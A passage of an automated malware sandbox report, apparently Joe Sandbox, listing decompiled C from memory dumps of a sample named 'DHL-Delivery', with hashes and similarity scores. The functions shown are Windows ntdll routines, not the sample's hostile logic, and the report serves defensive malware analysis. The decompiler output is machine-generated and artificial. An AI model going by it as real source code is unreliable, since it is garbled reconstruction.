                        						_t128 = _t128 + 0xc;
                        						_t110 = _t110 + _t91 * 2;
                        					}
                        					_t78 = E1E12DED0(_t110, _v16 - _t110 >> 1, L"%x",  *(_t126 + _t127 * 2) & 0x0000ffff);
                        					_t111 = _v8;
                        					_t128 = _t128 + 0x10;
                        					L15:
                        					_t123 = _v24;
                        					_t110 = _t110 + _t78 * 2;
                        					_t72 = _v12;
                        					_t127 = _t127 + 1;
                        				} while (_t127 < _t123);
                        				if(_t123 < 8) {
                        					_push( *(_t126 + 0xf) & 0x000000ff);
                        					_push( *(_t126 + 0xe) & 0x000000ff);
                        					_push( *(_t126 + 0xd) & 0x000000ff);
                        					_t110 = _t110 + E1E12DED0(_t110, _v16 - _t110 >> 1, L":%u.%u.%u.%u",  *(_t126 + 0xc) & 0x000000ff) * 2;
                        				}
                        				return _t110;
                        			}

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp Download File
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: ___swprintf_l
                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                        • API String ID: 48624451-2108815105
                        • Opcode ID: c11f71adec052349c277d226eb65e98254e806c16055c58cb3b866cf88d88c43
                        • Instruction ID: 4cebbf40064434f4f046d0166cc6c3415adcdc9c638b131700615c20f85ad953
                        • Opcode Fuzzy Hash: c11f71adec052349c277d226eb65e98254e806c16055c58cb3b866cf88d88c43
                        • Instruction Fuzzy Hash: BA61C475A00197EBCB10DF6DDD908BEB7B9BB04200B608775E465DB241D734EE948BE0
                        Uniqueness

                        Uniqueness Score: 0.10%

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp Download File
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: DebugPrintTimes
                        • String ID: HEAP:
                        • API String ID: 3446177414-2466845122
                        • Opcode ID: c19c78ea2f387741f48cf76d12ba98a2244118fcedc9fb508d0b171fd7764a65
                        • Instruction ID: b8a89176c5e2c1f0c0e6bd85f0d7555122eb3954c674086b32c32151cca472ea
                        • Opcode Fuzzy Hash: c19c78ea2f387741f48cf76d12ba98a2244118fcedc9fb508d0b171fd7764a65
                        • Instruction Fuzzy Hash: 25A17C75A043128FD714CE28C8A0A5AB7F6BF88350F194B2EE941DB350EB70ED85CB91
                        Uniqueness

                        Uniqueness Score: 100.00%

                        C-Code - Quality: 62%
                        			E1E0DBE3E(intOrPtr* __ecx) {
                        				signed int _v8;
                        				char _v16;
                        				char _v92;
                        				char _v93;
                        				char _v100;
                        				signed short _v106;
                        				char _v108;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				intOrPtr* _t56;
                        				signed char _t67;
                        				intOrPtr _t76;
                        				signed char _t81;
                        				signed int _t86;
                        				signed int _t87;
                        				char _t88;
                        				intOrPtr _t103;
                        				signed int _t106;
                        				intOrPtr* _t110;
                        				signed int _t111;
                        				signed int _t112;
                        				intOrPtr _t113;
                        				signed int _t114;
                        				intOrPtr* _t116;
                        				signed int _t117;
                        				void* _t118;
                        
                        				_v8 =  *0x1e1d6360 ^ _t117;
                        				_v93 = 1;
                        				_t110 = __ecx;
                        				E1E0FA838(0, 0x4001,  &_v92);
                        				_t106 =  *0x7ffe0330;
                        				_t86 =  *0x1e1d4200; // 0x0
                        				_t113 = 0x20;
                        				 *0x1e1d14b8 = 1;
                        				_t92 = _t113 - (_t106 & 0x0000001f);
                        				asm("ror ebx, cl");
                        				_t87 = _t86 ^ _t106;
                        				_t120 =  *__ecx;
                        				if( *__ecx == 0) {
                        					L8:
                        					_t88 = _v93;
                        					L9:
                        					if(_v16 != 0) {
                        						E1E0E1EE0(_t92, _v92);
                        					}
                        					_t114 =  *0x1e1d4210; // 0x0
                        					asm("ror esi, cl");
                        					 *0x1e1d41e0();
                        					 *(_t114 ^  *0x7ffe0330)();
                        					_t108 =  *0x7ffe0330;
                        					_t111 =  *0x1e1d4218; // 0x0
                        					_push(0x20);
                        					asm("ror edi, cl");
                        					_t112 = _t111 ^  *0x7ffe0330;
                        					E1E0FFDF0(0x1e1ce2d8);
                        					_t98 = 0x1e1d0c4c;
                        					if( *0x1e1d14b0 != 0) {
                        						_t56 =  *0x1e1d0c4c; // 0x752c20
                        						while(1) {
                        							__eflags = _t56 - _t98;
                        							if(_t56 == _t98) {
                        								break;
                        							}
                        							_v100 = _t56;
                        							_t39 = _t56 + 0x35;
                        							 *_t39 =  *(_t56 + 0x35) & 0x000000f7;
                        							__eflags =  *_t39;
                        							_t56 =  *_t56;
                        						}
                        						goto L11;
                        					} else {
                        						L11:
                        						_t116 =  *0x1e1d0c4c; // 0x752c20
                        						if( *0x1e1d14b4 < 2) {
                        							_t116 =  *_t116;
                        						}
                        						if(_t116 == _t98) {
                        							L15:
                        							 *0x1e1d14b0 = 1;
                        							 *0x1e1d14b8 = 0;
                        							E1E0FFFF0(_t98, 0x1e1ce2d8);
                        							E1E0DC04C(_t98);
                        							return E1E1225C0(_t88, _t88, _v8 ^ _t117, _t108, _t112, _t116);
                        						} else {
                        							do {
                        								_v100 = _t116;
                        								_t108 = _t112;
                        								_t24 = _t116 + 0x50; // 0x752be8
                        								_t98 =  *_t24;
                        								E1E0DBFDF( *_t24, _t112);
                        								_t116 =  *_t116;
                        							} while (_t116 != 0x1e1d0c4c);
                        							goto L15;
                        						}
                        					}
                        				} else {
                        					goto L1;
                        				}
                        				do {
                        					L1:
                        					E1E122AC0(_t92,  &_v108, _t110);
                        					_t92 = E1E0FAE6D( &_v108,  &_v92, _t120, 1,  &_v100);
                        					if(_t92 < 0) {
                        						_t67 =  *0x1e1ce7b0; // 0x0
                        						__eflags = _t67 & 0x00000003;
                        						if((_t67 & 0x00000003) != 0) {
                        							_push(_t92);
                        							E1E15BDA0("minkernel\\ntdll\\ldrinit.c", 0x8cc, "LdrpLoadShimEngine", 0, "Loading the shim DLL \"%wZ\" failed with status 0x%08lx\n",  &_v108);
                        							_t67 =  *0x1e1ce7b0; // 0x0
                        							_t118 = _t118 + 0x1c;
                        						}
                        						__eflags = _t67 & 0x00000010;
                        						if((_t67 & 0x00000010) != 0) {
                        							asm("int3");
                        						}
                        						_v93 = 0;
                        						goto L6;
                        					}
                        					 *(_v100 + 0x34) =  *(_v100 + 0x34) | 0x00000100;
                        					E1E10DCFF(_v100);
                        					_t76 = _v100;
                        					_t103 =  *((intOrPtr*)(_t76 + 0x50));
                        					_t122 =  *((intOrPtr*)(_t103 + 0x20)) - 7;
                        					if( *((intOrPtr*)(_t103 + 0x20)) != 7) {
                        						L5:
                        						 *0x1e1d41e0( *((intOrPtr*)(_t76 + 0x18)));
                        						 *_t87();
                        						_t92 = _v100;
                        						E1E0FB42D(_t87, _v100, _t113);
                        						goto L6;
                        					}
                        					_t113 = E1E0FA523(_t87, _t103, _t110, _t113, _t122);
                        					if(_t113 < 0) {
                        						_t81 =  *0x1e1ce7b0; // 0x0
                        						_t88 = 0;
                        						__eflags = _t81 & 0x00000003;
                        						if((_t81 & 0x00000003) != 0) {
                        							_push(_t113);
                        							E1E15BDA0("minkernel\\ntdll\\ldrinit.c", 0x8e6, "LdrpLoadShimEngine", 0, "Initializing the shim DLL \"%wZ\" failed with status 0x%08lx\n",  &_v108);
                        							_t81 =  *0x1e1ce7b0; // 0x0
                        						}
                        						__eflags = _t81 & 0x00000010;
                        						if((_t81 & 0x00000010) != 0) {
                        							asm("int3");
                        						}
                        						_t92 = _t113;
                        						E1E15F328(_t113);
                        						_push(_t113);
                        						_push(0xffffffff);
                        						E1E120760();
                        						_t113 = 0x20;
                        						goto L9;
                        					}
                        					_t76 = _v100;
                        					goto L5;
                        					L6:
                        					_t110 = _t110 + ((_v106 & 0x0000ffff) >> 1) * 2;
                        				} while ( *_t110 != 0);
                        				_t113 = 0x20;
                        				goto L8;
                        			}

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp Download File
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: DebugPrintTimes
                        • String ID: ,u$Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                        • API String ID: 3446177414-2149402871
                        • Opcode ID: ef405ebbde3b6590314dc9902f5050bc7455fc927a10c527a5282a310aaa575b
                        • Instruction ID: 497637c9c758218a549647d1911ed9ce2f36ba5ed77eb67ee8b8e3c1ad7c6c23
                        • Opcode Fuzzy Hash: ef405ebbde3b6590314dc9902f5050bc7455fc927a10c527a5282a310aaa575b
                        • Instruction Fuzzy Hash: 51511635B103A49BCB04DBA8CC98BDD77B6BF45304F514769E946BB389CB64AC84CB90
                        Uniqueness

                        Uniqueness Score: 100.00%

                        C-Code - Quality: 92%
                        			E1E128EBE(intOrPtr __edx, intOrPtr* _a8, signed int _a12, signed int _a16, signed int _a20) {
                        				signed char _v5;
                        				signed int _v12;
                        				signed int _v16;
                        				signed int _v20;
                        				signed int _v24;
                        				intOrPtr _v28;
                        				intOrPtr _v32;
                        				intOrPtr _v36;
                        				signed char _v40;
                        				intOrPtr _v44;
                        				intOrPtr _v48;
                        				signed int _v52;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				intOrPtr* _t82;
                        				signed int _t86;
                        				signed int _t89;
                        				intOrPtr _t91;
                        				void* _t93;
                        				void* _t94;
                        				signed int _t95;
                        				signed int _t96;
                        				signed int _t97;
                        				void* _t100;
                        				signed char _t101;
                        				void* _t102;
                        				signed char _t103;
                        				void* _t104;
                        				signed char _t105;
                        				signed char _t107;
                        				signed int _t108;
                        				signed int _t111;
                        				intOrPtr* _t112;
                        				signed int _t113;
                        				intOrPtr _t114;
                        				signed int _t115;
                        				signed int _t116;
                        				signed int _t117;
                        				signed int _t118;
                        				signed int _t119;
                        				signed int _t121;
                        				intOrPtr _t122;
                        				signed int _t125;
                        				signed int _t127;
                        				signed int _t128;
                        				void* _t130;
                        				signed int _t131;
                        				intOrPtr _t132;
                        				void* _t134;
                        
                        				_t122 = __edx;
                        				_t82 = _a12;
                        				_t112 = _a8;
                        				if(_t82 != 0) {
                        					 *_t82 = _t112;
                        				}
                        				if(_t112 == 0) {
                        					L76:
                        					_push(0);
                        					_push(0);
                        					_push(0);
                        					_push(0);
                        					_push(0);
                        					E1E122517(_t104, _t112, _t122, _t130, _t134);
                        					__eflags = 0;
                        					return 0;
                        				}
                        				_t86 = _a16;
                        				if(_t86 == 0 || _t86 >= 2 && _t86 <= 0x24) {
                        					_push(_t104);
                        					_t105 =  *_t112;
                        					_push(_t134);
                        					_push(_t130);
                        					_v12 = 0;
                        					_t131 = _t112 + 1;
                        					_v16 = 0;
                        					while(( *(E1E128EB8() + (_t105 & 0x000000ff) * 2) & 0x00000008) != 0) {
                        						do {
                        							_t103 =  *_t131;
                        							_t131 = _t131 + 1;
                        						} while (_t103 == _t105);
                        						_t105 = _t103;
                        					}
                        					_t89 = _a20;
                        					_v5 = _t105;
                        					__eflags = _t105 - 0x2d;
                        					if(_t105 != 0x2d) {
                        						__eflags = _t105 - 0x2b;
                        						if(_t105 != 0x2b) {
                        							L14:
                        							_t113 = _a16;
                        							_v20 = _t89;
                        							__eflags = _t113;
                        							if(_t113 != 0) {
                        								L22:
                        								__eflags = _t113 - 0x10;
                        								if(_t113 != 0x10) {
                        									L27:
                        									asm("cdq");
                        									_push(_t105);
                        									_t114 = _t122;
                        									_v52 = _t113;
                        									_v48 = _t114;
                        									_t91 = E1E1241A0(0xffffffff, 0xffffffff, _t113, _t114);
                        									_v40 = _t105;
                        									_t107 = _v5;
                        									__eflags = 0;
                        									_v44 = _t114;
                        									_v28 = _t91;
                        									_v32 = _t122;
                        									while(1) {
                        										_v24 = _t107 & 0x000000ff;
                        										_t93 = E1E128EB8();
                        										_t115 = _v24;
                        										__eflags =  *(_t93 + _t115 * 2) & 0x00000004;
                        										if(( *(_t93 + _t115 * 2) & 0x00000004) == 0) {
                        											goto L30;
                        										}
                        										_t128 = _t107 - 0x30;
                        										L34:
                        										_t108 = _v20;
                        										_t95 = _v16;
                        										_v24 = _t128;
                        										__eflags = _t128 - _a16;
                        										if(_t128 >= _a16) {
                        											L49:
                        											_t117 = _a12;
                        											L50:
                        											_t132 = _t131 - 1;
                        											__eflags = _t108 & 0x00000008;
                        											if((_t108 & 0x00000008) != 0) {
                        												__eflags = _t108 & 0x00000004;
                        												if((_t108 & 0x00000004) != 0) {
                        													L64:
                        													_t96 = E1E16ABF0();
                        													 *_t96 = 0x22;
                        													__eflags = _t108 & 0x00000001;
                        													if((_t108 & 0x00000001) == 0) {
                        														__eflags = _t108 & 0x00000002;
                        														if((_t108 & 0x00000002) == 0) {
                        															_t97 = _t96 | 0xffffffff;
                        															_t118 = 0x7fffffff;
                        														} else {
                        															_t97 = 0;
                        															_t118 = 0x80000000;
                        														}
                        													} else {
                        														_t97 = _t96 | 0xffffffff;
                        														_t118 = _t117 | 0xffffffff;
                        													}
                        													L71:
                        													_t125 = _a12;
                        													__eflags = _t125;
                        													if(_t125 != 0) {
                        														 *_t125 = _t132;
                        													}
                        													__eflags = _t108 & 0x00000002;
                        													if((_t108 & 0x00000002) != 0) {
                        														_t97 =  ~_t97;
                        														asm("adc ecx, esi");
                        														_t118 =  ~_t118;
                        													}
                        													return _t97;
                        												}
                        												__eflags = _t108 & 0x00000001;
                        												if((_t108 & 0x00000001) != 0) {
                        													L69:
                        													_t97 = _v12;
                        													L70:
                        													_t118 = _v16;
                        													goto L71;
                        												}
                        												__eflags = _t108 & 0x00000002;
                        												if((_t108 & 0x00000002) == 0) {
                        													__eflags = _t95 - 0x7fffffff;
                        													if(__eflags < 0) {
                        														goto L69;
                        													}
                        													if(__eflags > 0) {
                        														goto L64;
                        													}
                        													_t97 = _v12;
                        													__eflags = _t97 - 0xffffffff;
                        													if(_t97 <= 0xffffffff) {
                        														goto L70;
                        													}
                        													goto L64;
                        												}
                        												__eflags = _t95 - 0x80000000;
                        												if(__eflags > 0) {
                        													goto L64;
                        												}
                        												_t97 = _v12;
                        												if(__eflags < 0) {
                        													goto L70;
                        												}
                        												__eflags = _t97;
                        												if(_t97 > 0) {
                        													goto L64;
                        												}
                        												goto L70;
                        											}
                        											__eflags = _t117;
                        											if(_t117 != 0) {
                        												_t132 = _a8;
                        											}
                        											_t97 = 0;
                        											_t118 = 0;
                        											goto L71;
                        										}
                        										_t119 = _v12;
                        										_t111 = _t108 | 0x00000008;
                        										_v20 = _t111;
                        										__eflags = _t95 - _v32;
                        										if(__eflags < 0) {
                        											L45:
                        											_v24 = _t128;
                        											_v36 = 0;
                        											L46:
                        											_t121 = E1E123F10(_v52, _v48, _t119, _t95) + _v24;
                        											__eflags = _t121;
                        											_v12 = _t121;
                        											asm("adc eax, [ebp-0x20]");
                        											_v16 = _t128;
                        											L47:
                        											_t107 =  *_t131;
                        											_t131 = _t131 + 1;
                        											continue;
                        										}
                        										if(__eflags > 0) {
                        											L38:
                        											__eflags = _t119 - _v28;
                        											if(_t119 != _v28) {
                        												L43:
                        												_t117 = _a12;
                        												_t108 = _t111 | 0x00000004;
                        												_v20 = _t108;
                        												__eflags = _t117;
                        												if(_t117 == 0) {
                        													goto L50;
                        												}
                        												goto L47;
                        											}
                        											__eflags = _t95 - _v32;
                        											if(_t95 != _v32) {
                        												goto L43;
                        											}
                        											_v36 = 0;
                        											__eflags = 0 - _v40;
                        											if(__eflags < 0) {
                        												goto L46;
                        											}
                        											if(__eflags > 0) {
                        												goto L43;
                        											}
                        											__eflags = _t128 - _v44;
                        											if(_t128 <= _v44) {
                        												goto L46;
                        											}
                        											goto L43;
                        										}
                        										__eflags = _t119 - _v28;
                        										if(_t119 < _v28) {
                        											goto L45;
                        										}
                        										goto L38;
                        										L30:
                        										_t94 = E1E128EB8();
                        										_t116 = _v24;
                        										__eflags =  *(_t94 + _t116 * 2) & 0x00000103;
                        										if(( *(_t94 + _t116 * 2) & 0x00000103) == 0) {
                        											_t95 = _v16;
                        											_t108 = _v20;
                        											goto L49;
                        										}
                        										_t127 = _t107;
                        										__eflags = _t107 - 0x61 - 0x19;
                        										if(_t107 - 0x61 <= 0x19) {
                        											_t127 = _t127 + 0xffffffe0;
                        											__eflags = _t127;
                        										}
                        										_t128 = _t127 + 0xffffffc9;
                        										__eflags = _t128;
                        										goto L34;
                        									}
                        								}
                        								__eflags = _t105 - 0x30;
                        								if(_t105 != 0x30) {
                        									goto L27;
                        								}
                        								_t100 =  *_t131;
                        								__eflags = _t100 - 0x78;
                        								if(_t100 == 0x78) {
                        									L26:
                        									_t101 =  *(_t131 + 1);
                        									_t131 = _t131 + 2;
                        									__eflags = _t131;
                        									_v5 = _t101;
                        									goto L27;
                        								}
                        								__eflags = _t100 - 0x58;
                        								if(_t100 != 0x58) {
                        									goto L27;
                        								}
                        								goto L26;
                        							}
                        							__eflags = _t105 - 0x30;
                        							if(_t105 == 0x30) {
                        								_t102 =  *_t131;
                        								__eflags = _t102 - 0x78;
                        								if(_t102 == 0x78) {
                        									L21:
                        									_t113 = 0x10;
                        									_a16 = _t113;
                        									goto L22;
                        								}
                        								__eflags = _t102 - 0x58;
                        								if(_t102 == 0x58) {
                        									goto L21;
                        								}
                        								_push(8);
                        								L17:
                        								_pop(_t113);
                        								_a16 = _t113;
                        								goto L27;
                        							}
                        							_push(0xa);
                        							goto L17;
                        						}
                        						L13:
                        						_t105 =  *_t131;
                        						_t131 = _t131 + 1;
                        						__eflags = _t131;
                        						_v5 = _t105;
                        						goto L14;
                        					}
                        					_t89 = _t89 | 0x00000002;
                        					goto L13;
                        				} else {
                        					goto L76;
                        				}
                        			}

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: __aulldvrm
                        • String ID: +$-$0$0
                        • API String ID: 1302938615-699404926
                        • Opcode ID: 864a4841bf14881472d8641397c5c174d208adea2aff330454295de6e3329379
                        • Instruction ID: 2e2678fe5dadc034021e0623dec6ed8e266a80698886cd5dc6a8a88b286c862c
                        • Opcode Fuzzy Hash: 864a4841bf14881472d8641397c5c174d208adea2aff330454295de6e3329379
                        • Instruction Fuzzy Hash: 3B81B570E0424B8EEB04CE69CD607EEBBB7AF45350FB8476AEC51AB285C73558C08758
                        Uniqueness

                        Uniqueness Score: 100.00%

                        C-Code - Quality: 93%
                        			E1E11BE40(intOrPtr* _a4, intOrPtr _a8, signed short _a12, intOrPtr _a16, intOrPtr* _a20) {
                        				signed int _v8;
                        				char _v10;
                        				char _v138;
                        				char _v140;
                        				intOrPtr _v144;
                        				intOrPtr _v148;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				intOrPtr _t27;
                        				void* _t28;
                        				char* _t30;
                        				short _t31;
                        				signed int _t34;
                        				signed int _t41;
                        				signed char _t47;
                        				void* _t54;
                        				intOrPtr* _t55;
                        				intOrPtr _t56;
                        				void* _t57;
                        				signed int _t60;
                        				void* _t61;
                        
                        				_v8 =  *0x1e1d6360 ^ _t60;
                        				_t48 = _a4;
                        				_v144 = _a8;
                        				_t27 = _a16;
                        				_v148 = _t27;
                        				_t47 = _a12 & 0x0000ffff;
                        				_t55 = _a20;
                        				if(_a4 == 0 || _t55 == 0) {
                        					L9:
                        					_t28 = 0xc000000d;
                        				} else {
                        					if(_t27 == 0) {
                        						if( *_t55 != 0) {
                        							goto L9;
                        						} else {
                        							goto L3;
                        						}
                        					} else {
                        						L3:
                        						_t30 =  &_v140;
                        						if(_t47 != 0) {
                        							_t31 = 0x5b;
                        							_v140 = _t31;
                        							_t30 =  &_v138;
                        						}
                        						_t57 = E1E11BF00(_t48, _t30);
                        						_t33 = _v144;
                        						if(_v144 != 0) {
                        							_t34 = E1E12DED0(_t57,  &_v10 - _t57 >> 1, L"%%%u", _t33);
                        							_t61 = _t61 + 0x10;
                        							_t57 = _t57 + _t34 * 2;
                        						}
                        						if(_t47 != 0) {
                        							_t41 = E1E12DED0(_t57,  &_v10 - _t57 >> 1, L"]:%u", _t47 & 0x0000ffff);
                        							_t61 = _t61 + 0x10;
                        							_t57 = _t57 + _t41 * 2;
                        						}
                        						_t56 = (_t57 -  &_v140 >> 1) + 1;
                        						 *_t55 = _t56;
                        						if( *_t55 < _t56) {
                        							goto L9;
                        						} else {
                        							E1E126370(_v148,  &_v140, _t56 + _t56);
                        							_t28 = 0;
                        						}
                        					}
                        				}
                        				return E1E1225C0(_t28, _t47, _v8 ^ _t60, _t54, _t55, _t56);
                        			}

                        APIs
                          • Part of subcall function 1E11BF00: ___swprintf_l.LIBCMT ref: 1E11BFAE
                          • Part of subcall function 1E11BF00: ___swprintf_l.LIBCMT ref: 1E11BFD3
                        • ___swprintf_l.LIBCMT ref: 1E1569C9
                        • ___swprintf_l.LIBCMT ref: 1E1569EF
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: ___swprintf_l
                        • String ID: %%%u$]:%u
                        • API String ID: 48624451-3050659472
                        • Opcode ID: f22df8ad984be550f87d82de323bd36cead9ae902ccab069c62a864d37d23f69
                        • Instruction ID: f639f191e8e211dc0d3349a918b674750723c9bd669d8760476e9150e987641e
                        • Opcode Fuzzy Hash: f22df8ad984be550f87d82de323bd36cead9ae902ccab069c62a864d37d23f69
                        • Instruction Fuzzy Hash: 13318675501219DEDB10CF39DD50FEA77B9FF44210F51466AE94AD7200EB30AE848BA1
                        Uniqueness

                        Uniqueness Score: 0.10%

                        C-Code - Quality: 31%
                        			E1E162F80(void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                        				intOrPtr _v0;
                        				char _v8;
                        				char _v12;
                        				char _v16;
                        				char _v20;
                        				void* __ebx;
                        				void* _t21;
                        				intOrPtr _t36;
                        				void* _t39;
                        
                        				_t21 = E1E0FB120(0, 0, 0x1e0b1b68,  &_v8);
                        				if(_t21 < 0) {
                        					return _t21;
                        				}
                        				_t42 = _v8;
                        				if(E1E0EB310(_v8, 0x1e0b1b78, 0,  &_v12, 0, _v0) >= 0) {
                        					_t42 = _v8;
                        					if(E1E0EB310(_v8, 0x1e0b1b70, 0,  &_v20, 0, _v0) >= 0) {
                        						_t42 = _v8;
                        						if(E1E0EB310(_v8, 0x1e0b1b80, 0,  &_v16, 0, _v0) >= 0) {
                        							_t36 = _v12;
                        							 *0x1e1d41e0(0, L"Wow64 Emulation Layer", __edi);
                        							_t39 = _v12();
                        							if(_t39 != 0) {
                        								 *0x1e1d41e0(_t39, 4, 0, _a12, 0, _a4, 0, _a8, 0);
                        								_v16();
                        								_t36 = _v20;
                        								 *0x1e1d41e0(_t39);
                        								_v20();
                        							}
                        						}
                        					}
                        				}
                        				return E1E0FB800(0, _t36, _t42);
                        			}

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: DebugPrintTimes
                        • String ID: Wow64 Emulation Layer
                        • API String ID: 3446177414-921169906
                        • Opcode ID: 0979554c2604e1e718f48d6e5514749715d2fb419eccaab32b6e38d47757a5e0
                        • Instruction ID: 0554e713b14f0dfb2e2052beb528bb839a72ff9849779ae4908d3ff92025845b
                        • Opcode Fuzzy Hash: 0979554c2604e1e718f48d6e5514749715d2fb419eccaab32b6e38d47757a5e0
                        • Instruction Fuzzy Hash: 53214A7950115EBFAF11DAA08C84DFF7B7CFF88298F100664FE01A2100D730AE159B60
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: DebugPrintTimes
                        • String ID:
                        • API String ID: 3446177414-0
                        • Opcode ID: b54ddf134704d246354cbae1192e7b778ab7a21c48ce1e6416941cb9542374a2
                        • Instruction ID: 95e407c792453a464667980a18adecebd40cba695a0ece11de594ef486e94bc1
                        • Opcode Fuzzy Hash: b54ddf134704d246354cbae1192e7b778ab7a21c48ce1e6416941cb9542374a2
                        • Instruction Fuzzy Hash: 92517D35B11622DFDB08CE19C9E0629B7F2FF69310B254A6DD90ADB754DB70AC91CB80
                        Uniqueness

                        Uniqueness Score: 0.70%

                        APIs
                        Strings
                        • GsHd, xrefs: 1E10FF5A
                        • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 1E14F668
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: DebugPrintTimes
                        • String ID: GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section
                        • API String ID: 3446177414-2815354625
                        • Opcode ID: 707dff11d23a109502bb614f0be4cdc797384fddc7f188910dfc0b2a2721133e
                        • Instruction ID: c1942b401cb30717595533a5cc7c3064c1c090bd4458d67a6451da5f28a6bd7a
                        • Opcode Fuzzy Hash: 707dff11d23a109502bb614f0be4cdc797384fddc7f188910dfc0b2a2721133e
                        • Instruction Fuzzy Hash: 4A51B0B26083469FD711CF11C985A9BBBE5FF8D354F100A2DF89596250D730E9C9CBA2
                        Uniqueness

                        Uniqueness Score: 100.00%